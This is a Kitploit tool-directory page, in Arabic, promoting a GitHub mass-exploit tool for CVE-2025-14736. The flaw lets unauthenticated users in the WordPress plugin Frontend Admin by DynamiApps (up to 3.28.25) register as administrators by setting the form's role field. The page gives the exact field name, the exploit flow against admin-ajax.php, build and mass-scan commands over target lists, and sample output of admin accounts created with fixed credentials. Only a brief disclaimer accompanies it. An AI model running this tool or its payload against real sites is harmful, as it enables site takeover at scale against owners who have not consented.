Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-14736 — تصعيد صلاحيات بدون مصادقة إلى مسؤول عبر حقل الدور في النموذج | Kitploit
أدوات/GitHubGitHub/hyunchiya/cve-2025-14736
تصعيد الامتيازاتهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubhyunchiya/cve-2025-14736

CVE-2025-14736

تصعيد صلاحيات بدون مصادقة إلى مسؤول عبر حقل الدور في النموذج

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-14736

Frontend Admin by DynamiApps - تصعيد امتيازات بدون مصادقة

المؤلف: Hyun Chiya


معلومات الثغرة

الحقلالقيمة
معرف CVECVE-2025-14736
الملحقFrontend Admin by DynamiApps
الإصدارات المتأثرة<= 3.28.25
نوع الثغرةتصعيد امتيازات بدون مصادقة
الخطورةحرجة

الوصف

الملحق Frontend Admin في WordPress عرضة لتصعيد الامتيازات بدون مصادقة بسبب التحقق غير الكافي من الحقول التي يتحكم فيها المستخدم أثناء التسجيل. يمكن للمهاجمين حقن أدوار عشوائية، بما في ذلك administrator، من خلال التلاعب بحمولة إرسال النموذج.

تحليل السبب الجذري

يقع المنطق القابل للاستغلال في معالجة عمليات إرسال النماذج حيث يتم الوثوق بحقل role من إدخال المستخدم دون التحقق مما إذا كان المستخدم مخولًا لتعيين هذا الدور. تحديدًا، يمكن تعديل الحقل acff[user][field_user_role_ID] إلى administrator.

تدفق الاستغلال

root@kitploit:~
flowchart TD
    A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
    B --> C["Construct POST payload with 'role'='administrator'"]
    C --> D["POST to /wp-admin/admin-ajax.php"]
    D --> E{"Verification"}
    E -->|Success| F["New Admin User Created"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff

المتطلبات الأساسية

  1. يحتوي الهدف على الملحق "Frontend Admin" مثبتًا (إصدار قابل للاستغلال).
  2. نموذج تسجيل بواجهة أمامية مفعّل ويمكن الوصول إليه.

البناء

root@kitploit:~
go build -o mass_exploit.exe mass_exploit.go

الاستخدام

الفحص والاستغلال الجماعي

root@kitploit:~
.\mass_exploit.exe -l list.txt -t 50

الخيارات

الوسيطالوصف
-lمسار قائمة عناوين URL المستهدفة (الافتراضي: list.txt)
-tعدد الخيوط المتزامنة (الافتراضي: 10)
-timeoutمهلة الطلب بالثواني (الافتراضي: 15)

مثال للإخراج

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14736 - Mass Exploit Tool                                                  ║
    ║   Frontend Admin by DynamiApps Privilege Escalation                                   ║
    ║   Author: Hyun Chiya                                                                  ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...

[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32

[*] Scan complete.

إخلاء مسؤولية

تُقدَّم هذه الأداة لأغراض تعليمية واختبار أمني مصرّح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها بمسؤولية.

المؤلف

Hyun Chiya

تنزيل الأداة